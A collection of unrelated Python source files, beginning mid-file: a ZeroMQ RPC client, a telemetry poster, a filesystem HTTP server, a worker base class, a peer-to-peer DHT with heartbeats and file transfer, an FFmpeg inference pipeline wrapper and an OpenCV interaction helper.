return dorpc
def start(self, req_address, sub_address="", client_secretkey_path = "", server_publickey_path = ""):
if self.__active:
return
# Start authenticator
if client_secretkey_path and server_publickey_path:
self.__authenticator = ThreadAuthenticator(self.__context)
self.__authenticator.start()
self.__authenticator.configure_curve(
domain="*",
location=zmq.auth.CURVE_ALLOW_ANY
)
publickey, secretkey = zmq.auth.load_certificate(client_secretkey_path)
serverkey, _ = zmq.auth.load_certificate(server_publickey_path)
self.__socket_sub.curve_secretkey = secretkey
self.__socket_sub.curve_publickey = publickey
self.__socket_sub.curve_serverkey = serverkey
self.__socket_req.curve_secretkey = secretkey
self.__socket_req.curve_publickey = publickey
self.__socket_req.curve_serverkey = serverkey
self.__socket_req.connect(req_address)
if sub_address:
self.__active = True
self.__socket_sub.connect(sub_address)
self.__thread = threading.Thread(target=self.run)
self.__thread.start()
self._last_received_ping = str(datetime.utcnow())
self.subscribe_topic(KEEP_ALIVE_TOPIC)
def stop(self):
if not self.__active:
return
self.__active = False
def join(self):
# Wait for RpcClient thread to exit
if self.__thread and self.__thread.is_alive():
self.__thread.join()
self.__thread = None
def run(self):
pull_tolerance = int(KEEP_ALIVE_TOLERANCE.total_seconds() * 1000)
while self.__active:
if not self.__socket_sub.poll(pull_tolerance):
self._on_unexpected_disconnected()
continue
# Receive data from subscribe socket
topic, data = self.__socket_sub.recv_json(flags=NOBLOCK)
if topic == KEEP_ALIVE_TOPIC:
#print("{} beat {}".format(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime()), data))
self._last_received_ping = data
else:
# Process data by callable function
self.callback(topic, data)
# Close socket
self.__socket_req.close()
self.__socket_sub.close()
@staticmethod
def _on_unexpected_disconnected():
print("RpcServer has no response over {tolerance} seconds, please check you connection."
.format(tolerance=KEEP_ALIVE_TOLERANCE.total_seconds()))
def callback(self, topic, data):
raise NotImplementedError
def subscribe_topic(self, topic):
self.__socket_sub.setsockopt_string(zmq.SUBSCRIBE, u'["{}"'.format(topic))
|
clients.py
|
import os
import psutil
import requests
import threading
from wafec_wrapt_custom.utility import fullname
base_url = os.environ.get('WWC_URL')
base_url = base_url if base_url else 'http://localhost:6543'
def _safe_run(target, args, kwargs):
try:
target(*args, **kwargs)
except:
pass
def _post_async(*args, **kwargs):
thread = threading.Thread(target=_safe_run, args=(requests.post, args, kwargs))
thread.start()
def add_proxy_interception_info(name, x=None, trace=None):
p = psutil.Process()
ps = p.name()
data = {'ps': ps, 'name': name, 'x': fullname(x), 'trace': trace}
_post_async(url=f'{base_url}/api/proxy/interception/add', json=data)
|
http.py
|
__all__ = ["serve_fs"]
import SimpleHTTPServer
import SocketServer
from fs.path import pathjoin, dirname
from fs.errors import FSError
from time import mktime
from cStringIO import StringIO
import cgi
import urllib
import posixpath
import time
import threading
import socket
def _datetime_to_epoch(d):
return mktime(d.timetuple())
class FSHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
"""A hacked together version of SimpleHTTPRequestHandler"""
def __init__(self, fs, request, client_address, server):
self._fs = fs
SimpleHTTPServer.SimpleHTTPRequestHandler.__init__(self, request, client_address, server)
def do_GET(self):
"""Serve a GET request."""
f = None
try:
f = self.send_head()
if f:
try:
self.copyfile(f, self.wfile)
except socket.error:
pass
finally:
if f is not None:
f.close()
def send_head(self):
"""Common code for GET and HEAD commands.
This sends the response code and MIME headers.
Return value is either a file object (which has to be copied
to the outputfile by the caller unless the command was HEAD,
and must be closed by the caller under all circumstances), or
None, in which case the caller has nothing further to do.
"""
path = self.translate_path(self.path)
f = None
if self._fs.isdir(path):
if not self.path.endswith('/'):
# redirect browser - doing basically what apache does
self.send_response(301)
self.send_header("Location", self.path + "/")
self.end_headers()
return None
for index in ("index.html", "index.htm"):
index = pathjoin(path, index)
if self._fs.exists(index):
path = index
break
else:
return self.list_directory(path)
ctype = self.guess_type(path)
try:
info = self._fs.getinfo(path)
f = self._fs.open(path, 'rb')
except FSError, e:
self.send_error(404, str(e))
return None
self.send_response(200)
self.send_header("Content-type", ctype)
self.send_header("Content-Length", str(info['size']))
if 'modified_time' in info:
self.send_header("Last-Modified", self.date_time_string(_datetime_to_epoch(info['modified_time'])))
self.end_headers()
return f
def list_directory(self, path):
"""Helper to produce a directory listing (absent index.html).
Return value is either a file object, or None (indicating an
error). In either case, the headers are sent, making the
interface the same as for send_head().
"""
try:
dir_paths = self._fs.listdir(path, dirs_only=True)
file_paths = self._fs.listdir(path, files_only=True)
except FSError:
self.send_error(404, "No permission to list directory")
return None
paths = [p+'/' for p in sorted(dir_paths, key=lambda p:p.lower())] + sorted(file_paths, key=lambda p:p.lower())
#list.sort(key=lambda a: a.lower())
f = StringIO()
displaypath = cgi.escape(urllib.unquote(self.path))
f.write('<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">')
f.write("<html>\n<title>Directory listing for %s</title>\n" % displaypath)
f.write("<body>\n<h2>Directory listing for %s</h2>\n" % displaypath)
f.write("<hr>\n<ul>\n")
parent = dirname(path)
if path != parent:
f.write('<li><a href="%s">../</a></li>' % urllib.quote(parent.rstrip('/') + '/'))
for path in paths:
f.write('<li><a href="%s">%s</a>\n'
% (urllib.quote(path), cgi.escape(path)))
f.write("</ul>\n<hr>\n</body>\n</html>\n")
length = f.tell()
f.seek(0)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Content-Length", str(length))
self.end_headers()
return f
def translate_path(self, path):
# abandon query parameters
path = path.split('?',1)[0]
path = path.split('#',1)[0]
path = posixpath.normpath(urllib.unquote(path))
return path
def serve_fs(fs, address='', port=8000):
"""Serve an FS instance over http
:param fs: an FS object
:param address: IP address to serve on
:param port: port number
"""
def Handler(request, client_address, server):
return FSHTTPRequestHandler(fs, request, client_address, server)
#class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
# pass
httpd = SocketServer.TCPServer((address, port), Handler, bind_and_activate=False)
#httpd = ThreadedTCPServer((address, port), Handler, bind_and_activate=False)
httpd.allow_reuse_address = True
httpd.server_bind()
httpd.server_activate()
server_thread = threading.Thread(target=httpd.serve_forever)
server_thread.start()
try:
while True:
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
httpd.shutdown()
if __name__ == "__main__":
from fs.osfs import OSFS
serve_fs(OSFS('~/'))
|
worker.py
|
import multiprocessing as mp
from abc import ABC, abstractmethod
class Worker(ABC):
"""
A generic worker class to implement other class based functionalities using
multi-processing
"""
@abstractmethod
def main(self):
# This function has to be implemented by the base class
pass
@property
@abstractmethod
def name(self):
# This property will return the name of the base class
# return "BaseClassName"
pass
def run(self):
# This function starts the main method for this worker after setting up the queues
# for communicaton
self.inputs = mp.Queue()
self.outputs = mp.Queue()
self.proc = mp.Process(target=self.main)
self.proc.start()
def stop(self):
# This function will kill the process
self.inputs.put(0)
# print("%s: Inputs(%s) Outputs(%s)" %(self.name(), self.inputs.empty(), self.outputs.empty()))
self.proc.join()
print("%s killed with code %s" %(self.name(), str(self.proc.exitcode)))
def get_output(self):
# This function reads and returns from the output queue
return None if self.outputs.empty() else self.outputs.get()
|
main.py
|
import sys
import threading
import time
from socket import *
class Peer():
def __init__(self):
super().__init__()
self.client_socket_udp = socket(AF_INET, SOCK_DGRAM)
self.server_socket_udp = socket(AF_INET, SOCK_DGRAM)
self.server_socket_tcp = socket(AF_INET, SOCK_STREAM)
self.udp_server_thread = threading.Thread(target=self.server_handler_udp)
self.tcp_server_thread = threading.Thread(target=self.server_handler_tcp)
self.client_thread = threading.Thread(target=self.client_handler)
self.input_thread = threading.Thread(target=self.read_input)
self.kill_thread = False
def initialise(self, peer, first_successor, second_successor, ping_interval, threads):
# Initialise the peer by setting up its successors and starting threads for servers and client
self.peer = int(peer)
self.first_successor = int(first_successor)
self.second_successor = int(second_successor)
print("My new first successor is Peer {}".format(self.first_successor))
print("My new second successor is Peer {}".format(self.second_successor))
self.ping_interval = int(ping_interval)
self.start_threads(threads)
self.files = []
return
def start_threads(self, threads):
# Start UDP server and client and TCP server on threads
if threads=="server" or threads=="all":
self.tcp_server_thread.start()
self.udp_server_thread.start()
self.input_thread.start()
if threads=="client" or threads=="all":
time.sleep(1)
self.client_thread.start()
return
def stop_threads(self):
# Stop the threads that are running
self.kill_thread = True
self.server_socket_udp.close()
self.server_socket_tcp.close()
print("UDP Server closed")
print("TCP Server closed")
return
def server_handler_udp(self):
# UDP Server thread function.
self.server_socket_udp.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.server_socket_udp.bind(("localhost", self.peer+12000))
print('UDP Server is ready for service')
while True and not self.kill_thread:
message, clientAddress = self.server_socket_udp.recvfrom(2048)
message = message.decode()
# print(message)
print('Ping request message received from Peer', message)
if message:
server_message = str(self.peer)
self.server_socket_udp.sendto(server_message.encode(), clientAddress)
self.server_socket_udp.close()
print("UDP Server closed")
return
def client_handler(self):
# UDP Client thread function.
message = str(self.peer)
heartbeat = {
self.first_successor: 0,
self.second_successor: 0
}
while True and not self.kill_thread:
print('Ping requests sent to Peers {} and {}'.format(self.first_successor, self.second_successor))
successors = [self.first_successor, self.second_successor]
heartbeat = {k:v for k,v in heartbeat.items() if k in successors}
for peer in successors:
if peer not in heartbeat:
heartbeat[peer] = 0
try:
self.client_socket_udp.settimeout(2)
# Heartbeat of Successors
self.client_socket_udp.sendto(message.encode(),("localhost", int(peer)+12000))
#wait for the reply from the server
receivedMessage, addr = self.client_socket_udp.recvfrom(2048)
receivedMessage = receivedMessage.decode()
print("Ping response received from Peer {}".format(peer))
heartbeat[peer] = 0
except timeout:
print("Heartbeat missing with Peer {}".format(peer))
heartbeat[peer] += 1
print(heartbeat)
if heartbeat[peer]>2:
self.remove_abrupt(peer)
time.sleep(self.ping_interval)
self.client_socket_udp.close()
print("UDP Client closed")
return
def server_handler_tcp(self):
# TCP Server function.
self.server_socket_tcp.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.server_socket_tcp.bind(('localhost', self.peer+12000))
self.server_socket_tcp.listen(5)
print('TCP Server is ready for service at {}'.format(self.peer+12000))
while True and not self.kill_thread:
conn, addr = self.server_socket_tcp.accept()
message, clientAddress = conn.recvfrom(2048)
#received data from the client, now we know who we are talking with
message = message.decode()
# print('TCP ping request received from Peer {}'.format(conn))
reply = self.process_tcp_request(message)
if reply:
conn.send(reply.encode())
conn.close()
self.server_socket_tcp.close()
print("TCP Server closed")
return
def process_tcp_request(self, message):
# Process the TCP request
decoded_message = message.split()
message_action = decoded_message[0]
# message_info = int(decoded_message[1])
reply = ""
if message_action=="join":
print("Peer {} Join request received".format(int(decoded_message[1])))
self.join_peer(int(decoded_message[1]))
elif message_action=="change":
self.change_successor(int(decoded_message[1]), int(decoded_message[2]), message)
elif message_action=="remove":
self.remove_successor(int(decoded_message[1]), int(decoded_message[2]), int(decoded_message[3]), message)
elif message_action=="Accepted":
self.initialise(self.peer, int(decoded_message[1]), int(decoded_message[2]), self.ping_interval, "client")
elif message_action=="store":
self.store_file(int(decoded_message[1]), decoded_message[2])
elif message_action=="get_successor":
reply = self.get_successor(int(decoded_message[1]))
elif message_action=="request":
reply = self.request_file(int(decoded_message[1]), decoded_message[2])
elif message_action=="get":
reply = self.get_file(decoded_message[1])
else:
print("File received")
self.save_received_file(message)
return reply
def tcp_request(self, dest, message):
# Function to send a message to destination (dest) over TCP. Returns the message received.
tcp_socket = socket(AF_INET, SOCK_STREAM)
tcp_socket.connect(("localhost", dest+12000))
tcp_socket.sendall(message.encode())
# wait for the reply from the server
receivedMessage = tcp_socket.recv(2048)
receivedMessage = receivedMessage.decode()
tcp_socket.close()
return receivedMessage
def join_request(self, peer, known_peer, ping_interval):
# Initial request by a new peer to join DHT.
self.peer = int(peer)
self.ping_interval = int(ping_interval)
tcp_socket = socket(AF_INET, SOCK_STREAM)
self.start_threads("server")
message = "join {}".format(peer)
receivedMessage = self.tcp_request(known_peer, message)
# receivedMessage = receivedMessage.split()
# if receivedMessage[0]=="Accepted":
# self.initialise(peer, receivedMessage[1], receivedMessage[2], ping_interval)
# print("My new first successor is Peer {}".format(self.first_successor))
# print("My new second successor is Peer {}".format(self.second_successor))
# else:
# print("Connection refused")
return
def join_peer(self, new_peer):
# Checks where the peer has to be added or the request to add peer should be sent.
# last node, add to current peer itself
if self.peer > self.first_successor:
self.add_peer(new_peer)
# first successor is the last, add to first successor
elif self.second_successor < self.first_successor and new_peer > self.first_successor:
print("Peer {} Join request forwarded to my successor {}".format(new_peer, self.first_successor))
message = "join {}".format(new_peer)
self.tcp_request(self.first_successor, message)
# first successor is the last, add to current peer
elif self.second_successor < self.first_successor and new_peer > self.peer:
self.add_peer(new_peer)
# send request to second
elif new_peer > self.second_successor:
print("Peer {} Join request forwarded to my successor {}".format(new_peer, self.second_successor))
message = "join {}".format(new_peer)
self.tcp_request(self.second_successor, message)
# send request to first, add to first successor
elif new_peer > self.first_successor:
print("Peer {} Join request forwarded to my successor {}".format(new_peer, self.first_successor))
message = "join {}".format(new_peer)
self.tcp_request(self.first_successor, message)
# add to current peer
else:
self.add_peer(new_peer)
return
def add_peer(self, new_peer):
# Add peer as a successor to current peer.
# successor change of predecessor
message = "change {} {}".format(self.peer, new_peer)
self.tcp_request(self.second_successor, message)
# Inform peer that it is accepted into DHT
message = "Accepted {} {}".format(self.first_successor, self.second_successor)
self.tcp_request(new_peer, message)
print("My new first successor is Peer {}".format(new_peer))
print("My new second successor is Peer {}".format(self.first_successor))
self.second_successor = self.first_successor
self.first_successor = new_peer
self.transfer_files("join")
return
def change_successor(self, source_peer, new_successor, message):
# Changes the successor of the peer. Happens when a new peer joins the DHT.
if self.first_successor == source_peer:
print("Successor Change request received")
self.second_successor = new_successor
print("My new first successor is Peer {}".format(self.first_successor))
print("My new second successor is Peer {}".format(self.second_successor))
elif self.second_successor == source_peer:
self.tcp_request(self.first_successor, message)
else:
self.tcp_request(self.second_successor, message)
return
def read_input(self):
# Read user inputs from command line in real-time
while True:
command = input()
command = command.split()
exit_list = ["Quit", "quit", "Exit", "exit", "Close", "close"]
if not command:
continue
if command[0] in exit_list:
print("exiting...\n")
self.remove_graceful()
print("Exit successful")
elif command[0].lower()=="store":
print("storing file...\n")
message = "store {} {}".format(self.peer, command[1])
print("File Store {} request forward to my first successor".format(command[1]))
self.tcp_request(self.first_successor, message)
elif command[0].lower()=="request":
print("retreiving file...\n")
self.request_file(self.peer, command[1])
else:
print("Yeah.")
return
def get_successor(self, successor):
# Return the required sucessor
if successor == 1:
reply = self.first_successor
elif successor == 2:
reply = str(self.second_successor)
return str(reply)
def remove_successor(self, gone_peer, new_first_successor, new_second_successor, message):
# Check if successor change due to peer departure is required
# Transfer message forward otherwise
if self.first_successor == gone_peer:
self.first_successor = new_first_successor
self.second_successor = new_second_successor
print("Peer {} will depart from the network".format(gone_peer))
print("My new first successor is Peer {}".format(self.first_successor))
print("My new second successor is Peer {}".format(self.second_successor))
elif self.second_successor == gone_peer:
self.second_successor = new_first_successor
print("Peer {} will depart from the network".format(gone_peer))
print("My new first successor is Peer {}".format(self.first_successor))
print("My new second successor is Peer {}".format(self.second_successor))
self.tcp_request(self.first_successor, message)
else:
self.tcp_request(self.first_successor, message)
return
def remove_graceful(self):
# Peer departs gracefully
message = "remove {} {} {}".format(self.peer, self.first_successor, self.second_successor)
self.tcp_request(self.first_successor, message)
self.transfer_files("leave")
self.stop_threads()
return
def remove_abrupt(self, peer):
# Remove a successor with no heartbeat
print("Peer {} is no longer alive".format(peer))
if peer == self.first_successor:
self.first_successor = self.second_successor
message = "get_successor 1"
received_messsage = self.tcp_request(self.first_successor, message)
self.second_successor = int(received_messsage)
print("My new first successor is Peer {}".format(self.first_successor))
print("My new second successor is Peer {}".format(self.second_successor))
return
def hash_file(self, filename):
return int(filename)%256
def get_file(self, filename):
with open(filename, "r") as f:
content = f.read()
return content
def save_file(self, peer_with_file, filename):
# Get file from peer and save it locally
message = "get {}".format(filename)
content = self.tcp_request(peer_with_file, message)
with open (str(filename), 'w+') as f:
f.write(content)
self.files.append(filename)
print("File saved")
return
def store_file(self, peer_with_file, filename):
# Store file in network based on hash value
file_peer = self.hash_file(filename)
message = "store {} {}".format(peer_with_file, filename)
if file_peer == self.peer:
print("File Store {} request accepted".format(filename))
self.save_file(peer_with_file, filename)
elif file_peer > self.peer:
# current peer is last peer
if self.first_successor < self.peer:
print("File Store {} request accepted".format(filename))
self.save_file(peer_with_file, filename)
# current peer is second last peer
elif self.second_successor < self.first_successor:
print("File Store {} request forward to my first successor".format(filename))
self.tcp_request(self.first_successor, message)
# store in first successor
elif file_peer <= self.first_successor:
print("File Store {} request forward to my first successor".format(filename))
self.tcp_request(self.first_successor, message)
if file_peer < self.peer and self.first_successor > self.peer:
print("File Store {} request accepted".format(filename))
self.save_file(peer_with_file, filename)
elif file_peer < self.first_successor:
print("File Store {} request forward to my first successor".format(filename))
self.tcp_request(self.first_successor, message)
else:
print("File Store {} request forward to my second successor".format(filename))
self.tcp_request(self.second_successor, message)
return
def request_file(self, peer_requiring_file, filename):
# Find peer with file
message = "request {} {}".format(peer_requiring_file, filename)
file_peer = self.hash_file(filename)
if filename in self.files:
print("File {} is stored here".format(filename))
self.send_file(peer_requiring_file, filename)
else:
print("Request for File {} has been received, but the file is not stored here".format(filename))
self.tcp_request(self.first_successor, message)
return
def save_received_file(self, content):
# Save received file with custom name
filename = time.strftime("received_%y%m%d_%H%M%S")
with open (filename, 'w+') as f:
f.write(content)
self.files.append(filename)
print("File saved")
return
def send_file(self, peer_requiring_file, filename):
# Returns content of file
print("Sending file {} to Peer {}".format(filename, peer_requiring_file))
with open(filename, "r") as f:
content = f.read()
print("The file has been sent")
self.tcp_request(peer_requiring_file, content)
return
def transfer_files(self, condition):
# Transfer files when leaving network
# transfer appropriate files to newly joined peer
if condition=="join":
for filename in self.files:
file_hash = self.hash_file(filename)
if file_hash < self.first_successor and file_hash > self.peer:
self.store_file(self.peer, filename)
# transfer all files to appropriate peer
elif condition=="leave":
for filename in self.files:
message = "store {} {}".format(self.peer, filename)
self.tcp_request(self.first_successor, message)
else:
print("What do you mean {}?".format(condition))
return
def main():
call_type = sys.argv[1]
peer_name = int(sys.argv[2])
if call_type=="init":
first_successor = sys.argv[3]
second_successor = sys.argv[4]
ping_interval = sys.argv[5]
print(call_type, peer_name, first_successor, second_successor, ping_interval)
peer = Peer()
peer.initialise(peer_name, first_successor, second_successor, ping_interval, "all")
elif call_type=="join":
known_peer = int(sys.argv[3])
ping_interval = int(sys.argv[4])
peer = Peer()
peer.peer = peer_name
peer.join_request(peer_name, known_peer, ping_interval)
return
if __name__ == "__main__":
main()
|
FFmpegPipeline.py
|
'''
* Copyright (C) 2019 Intel Corporation.
*
* SPDX-License-Identifier: BSD-3-Clause
'''
from modules.Pipeline import Pipeline # pylint: disable=import-error
from modules.PipelineManager import PipelineManager # pylint: disable=import-error
from modules.ModelManager import ModelManager # pylint: disable=import-error
from common.utils import logging # pylint: disable=import-error
import string
import shlex
import subprocess
import time
import copy
from threading import Thread
import shutil
import uuid
import re
logger = logging.get_logger('FFmpegPipeline', is_static=True)
if shutil.which('ffmpeg') is None:
raise Exception("ffmpeg not installed")
class FFmpegPipeline(Pipeline):
GVA_INFERENCE_FILTER_TYPES = ["detect",
"classify"]
DEVICEID_MAP = {2:'CPU',
3:'GPU',
5:'VPU',
6:'HDDL'}
def __init__(self, id, config, models, request):
self.config = config
self.models = models
self.template = config['template']
self.id = id
self._process = None
self.start_time = None
self.stop_time = None
self._ffmpeg_launch_string = None
self.request = request
self.state = "QUEUED"
self.fps = 0
def stop(self):
self.state = "ABORTED"
return self.status()
def params(self):
request = copy.deepcopy(self.request)
if "models" in request:
del(request["models"])
params_obj = {
"id": self.id,
"request": request,
"type": self.config["type"],
"launch_command": self._ffmpeg_launch_string
}
return params_obj
def status(self):
logger.debug("Called Status")
if self.stop_time is not None:
elapsed_time = self.stop_time - self.start_time
elif self.start_time is not None:
elapsed_time = time.time() - self.start_time
else:
elapsed_time = None
status_obj = {
"id": self.id,
"state": self.state,
"avg_fps": self.fps,
"start_time": self.start_time,
"elapsed_time": elapsed_time
}
return status_obj
@staticmethod
def validate_config(config):
pass
def _spawn(self,args):
self.start_time = time.time()
logger.debug(args)
self._process=subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=1, universal_newlines=True)
self.state = "RUNNING"
self._process.poll()
while self._process.returncode is None and self.state != "ABORTED":
next_line = self._process.stderr.readline()
fps_idx = next_line.rfind('fps=')
q_idx = next_line.rfind('q=')
if fps_idx != -1 and q_idx != -1:
self.fps = int(float(next_line[fps_idx+4:q_idx].strip()))
self._process.poll()
self.stop_time = time.time()
if self.state == "ABORTED":
self._process.kill()
else:
if self._process.returncode == 0:
self.state = "COMPLETED"
else:
self.state = "ERROR"
PipelineManager.pipeline_finished()
self._process = None
def _add_tags(self, iemetadata_args):
if "tags" in self.request:
try:
for key in self.request["tags"]:
iemetadata_args.append("-custom_tag")
iemetadata_args.append("%s:%s," % (key, self.request["tags"][key]))
if len(iemetadata_args):
# remove final comma
iemetadata_args[-1] = iemetadata_args[-1][:-1]
except Exception:
logger.error("Error adding tags")
def _get_filter_params(self,_filter):
result = {}
params = re.split("=|:",_filter)
result['type'] = params[0]
for x in range(1,len(params[0:]),2):
result[params[x]] = params[x+1]
return result
def _join_filter_params(self,filter_params):
filter_type = filter_params.pop('type')
parameters = ["%s=%s" %(x,y) for (x,y) in filter_params.items()]
return "{filter_type}={params}".format(filter_type=filter_type,params=':'.join(parameters))
def _add_default_models(self,args):
vf_index = args.index('-vf') if ('-vf' in args) else None
if (vf_index==None):
return
filters = args[vf_index+1].split(',')
new_filters=[]
for _filter in filters:
filter_params = self._get_filter_params(_filter)
if ( (filter_params['type'] in FFmpegPipeline.GVA_INFERENCE_FILTER_TYPES) and
("VA_DEVICE_DEFAULT" in filter_params['model'])):
device="CPU"
if ("device" in filter_params):
device=filter_params["device"]
if isinstance(filter_params['device'],int):
device = FFmpegPipeline.DEVICEID_MAP[int(filter_params['device'])]
filter_params["model"] = ModelManager.get_default_network_for_device(device,filter_params["model"])
new_filters.append(self._join_filter_params(filter_params))
else:
new_filters.append(_filter)
args[vf_index+1] =','.join(new_filters)
def start(self):
logger.debug("Starting Pipeline {id}".format(id=self.id))
self.request["models"] = self.models
self._ffmpeg_launch_string = string.Formatter().vformat(self.template, [], self.request)
args = ['ffmpeg']
args.extend(shlex.split(self._ffmpeg_launch_string))
iemetadata_args = ["-f", "iemetadata", "-source_url", self.request["source"]["uri"]]
self._add_tags(iemetadata_args)
if 'destination' in self.request:
if self.request['destination']['type'] == "kafka":
for item in self.request['destination']['host'].split(','):
iemetadata_args.append("kafka://"+item+"/"+self.request["destination"]["topic"])
elif self.request['destination']['type'] == "file":
iemetadata_args.append(self.request['destination']['path'])
else:
logger.warning("No destination in pipeline request {id}. Results will be discarded.".format(id=self.id))
iemetadata_args.append("/dev/null")
args.extend(iemetadata_args)
self._add_default_models(args)
logger.debug(args)
thread = Thread(target=self._spawn, args=[args])
thread.start()
|
interact.py
|
import os
import sys
import time
import types
import multiprocessing
import cv2
from tqdm import tqdm
try:
import IPython #if success we are in colab
from IPython.display import display, clear_output
import PIL
import matplotlib.pyplot as plt
is_colab = True
except:
is_colab = False
class InteractBase(object):
EVENT_LBUTTONDOWN = 1
EVENT_LBUTTONUP = 2
EVENT_MBUTTONDOWN = 3
EVENT_MBUTTONUP = 4
EVENT_RBUTTONDOWN = 5
EVENT_RBUTTONUP = 6
EVENT_MOUSEWHEEL = 10
def __init__(self):
self.named_windows = {}
self.capture_mouse_windows = {}
self.capture_keys_windows = {}
self.mouse_events = {}
self.key_events = {}
self.pg_bar = None
def is_colab(self):
return False
def on_destroy_all_windows(self):
raise NotImplemented
def on_create_window (self, wnd_name):
raise NotImplemented
def on_show_image (self, wnd_name, img):
raise NotImplemented
def on_capture_mouse (self, wnd_name):
raise NotImplemented
def on_capture_keys (self, wnd_name):
raise NotImplemented
def on_process_messages(self, sleep_time=0):
raise NotImplemented
def on_wait_any_key(self):
raise NotImplemented
def log_info(self, msg, end='\n'):
print (msg, end=end)
def log_err(self, msg, end='\n'):
print (msg, end=end)
def named_window(self, wnd_name):
if wnd_name not in self.named_windows:
#we will show window only on first show_image
self.named_windows[wnd_name] = 0
else: print("named_window: ", wnd_name, " already created.")
def destroy_all_windows(self):
if len( self.named_windows ) != 0:
self.on_destroy_all_windows()
self.named_windows = {}
self.capture_mouse_windows = {}
self.capture_keys_windows = {}
self.mouse_events = {}
self.key_events = {}
def show_image(self, wnd_name, img):
if wnd_name in self.named_windows:
if self.named_windows[wnd_name] == 0:
self.named_windows[wnd_name] = 1
self.on_create_window(wnd_name)
if wnd_name in self.capture_mouse_windows:
self.capture_mouse(wnd_name)
self.on_show_image(wnd_name,img)
else: print("show_image: named_window ", wnd_name, " not found.")
def capture_mouse(self, wnd_name):
if wnd_name in self.named_windows:
self.capture_mouse_windows[wnd_name] = True
if self.named_windows[wnd_name] == 1:
self.on_capture_mouse(wnd_name)
else: print("capture_mouse: named_window ", wnd_name, " not found.")
def capture_keys(self, wnd_name):
if wnd_name in self.named_windows:
if wnd_name not in self.capture_keys_windows:
self.capture_keys_windows[wnd_name] = True
self.on_capture_keys(wnd_name)
else: print("capture_keys: already set for window ", wnd_name)
else: print("capture_keys: named_window ", wnd_name, " not found.")
def progress_bar(self, desc, total, leave=True):
if self.pg_bar is None:
self.pg_bar = tqdm( total=total, desc=desc, leave=leave, ascii=True )
else: print("progress_bar: already set.")
def progress_bar_inc(self, c):
if self.pg_bar is not None:
self.pg_bar.n += c
self.pg_bar.refresh()
else: print("progress_bar not set.")
def progress_bar_close(self):
if self.pg_bar is not None:
self.pg_bar.close()
self.pg_bar = None
else: print("progress_bar not set.")
def progress_bar_generator(self, data, desc, leave=True):
for x in tqdm( data, desc=desc, leave=leave, ascii=True ):
yield x
def process_messages(self, sleep_time=0):
self.on_process_messages(sleep_time)
def wait_any_key(self):
self.on_wait_any_key()
def add_mouse_event(self, wnd_name, x, y, ev, flags):
if wnd_name not in self.mouse_events:
self.mouse_events[wnd_name] = []
self.mouse_events[wnd_name] += [ (x, y, ev, flags) ]
def add_key_event(self, wnd_name, ord_key, ctrl_pressed, alt_pressed, shift_pressed):
if wnd_name not in self.key_events:
self.key_events[wnd_name] = []
self.key_events[wnd_name] += [ (ord_key, chr(ord_key), ctrl_pressed, alt_pressed, shift_pressed) ]
def get_mouse_events(self, wnd_name):
ar = self.mouse_events.get(wnd_name, [])
self.mouse_events[wnd_name] = []
return ar
def get_key_events(self, wnd_name):
ar = self.key_events.get(wnd_name, [])
self.key_events[wnd_name] = []
return ar
def input_number(self, s, default_value, valid_list=None, help_message=None):
while True:
try:
inp = input(s)
if len(inp) == 0:
raise ValueError("")
if help_message is not None and inp == '?':
print (help_message)
continue
i = float(inp)
if (valid_list is not None) and (i not in valid_list):
return default_value
return i
except:
print (default_value)
return default_value
def input_int(self,s, default_value, valid_list=None, help_message=None):
while True:
try:
inp = input(s)
if len(inp) == 0:
raise ValueError("")
if help_message is not None and inp == '?':
print (help_message)
continue
i = int(inp)
if (valid_list is not None) and (i not in valid_list):
return default_value
return i
except:
print (default_value)
return default_value
def input_bool(self, s, default_value, help_message=None):
while True:
try:
inp = input(s)
if len(inp) == 0:
raise ValueError("")
if help_message is not None and inp == '?':
print (help_message)
continue
return bool ( {"y":True,"n":False,"1":True,"0":False}.get(inp.lower(), default_value) )
except:
print ( "y" if default_value else "n" )
return default_value
def input_str(self, s, default_value, valid_list=None, help_message=None):
while True:
try:
inp = input(s)
if len(inp) == 0:
raise ValueError("")
if help_message is not None and inp == '?':
print (help_message)
continue
if (valid_list is not None) and (inp.lower() not in valid_list):
return default_value
return inp
except:
print (default_value)
return default_value
def input_process(self, stdin_fd, sq, str):
sys.stdin = os.fdopen(stdin_fd)
try:
inp = input (str)
sq.put (True)
except:
sq.put (False)
def input_in_time (self, str, max_time_sec):
sq = multiprocessing.Queue()
p = multiprocessing.Process(target=self.input_process, args=( sys.stdin.fileno(), sq, str))
p.start()
t = time.time()
inp = False
while True:
if not sq.empty():
inp = sq.get()
break
if time.time() - t > max_time_sec:
break
p.terminate()
sys.stdin = os.fdopen( sys.stdin.fileno() )
return inp
class InteractDesktop(InteractBase):
def on_destroy_all_windows(self):
cv2.destroyAllWindows()
def on_create_window (self, wnd_name):
cv2.namedWindow(wnd_name)
def on_show_image (self, wnd_name, img):
cv2.imshow (wnd_name, img)
def on_capture_mouse (self, wnd_name):
self.last_xy = (0,0)
def onMouse(event, x, y, flags, param):
(inst, wnd_name) = param
if event == cv2.EVENT_LBUTTONDOWN: ev = InteractBase.EVENT_LBUTTONDOWN
elif event == cv2.EVENT_LBUTTONUP: ev = InteractBase.EVENT_LBUTTONUP
elif event == cv2.EVENT_RBUTTONDOWN: ev = InteractBase.EVENT_RBUTTONDOWN
elif event == cv2.EVENT_RBUTTONUP: ev = InteractBase.EVENT_RBUTTONUP
elif event == cv2.EVENT_MBUTTONDOWN: ev = InteractBase.EVENT_MBUTTONDOWN
elif event == cv2.EVENT_MBUTTONUP: ev = InteractBase.EVENT_MBUTTONUP
elif event == cv2.EVENT_MOUSEWHEEL:
ev = InteractBase.EVENT_MOUSEWHEEL
x,y = self.last_xy #fix opencv bug when window size more than screen size
else: ev = 0
self.last_xy = (x,y)
inst.add_mouse_event (wnd_name, x, y, ev, flags)
cv2.setMouseCallback(wnd_name, onMouse, (self,wnd_name) )
def on_capture_keys (self, wnd_name):
pass
def on_process_messages(self, sleep_time=0):
has_windows = False
has_capture_keys = False
if len(self.named_windows) != 0:
has_windows = True
if len(self.capture_keys_windows) != 0:
has_capture_keys = True
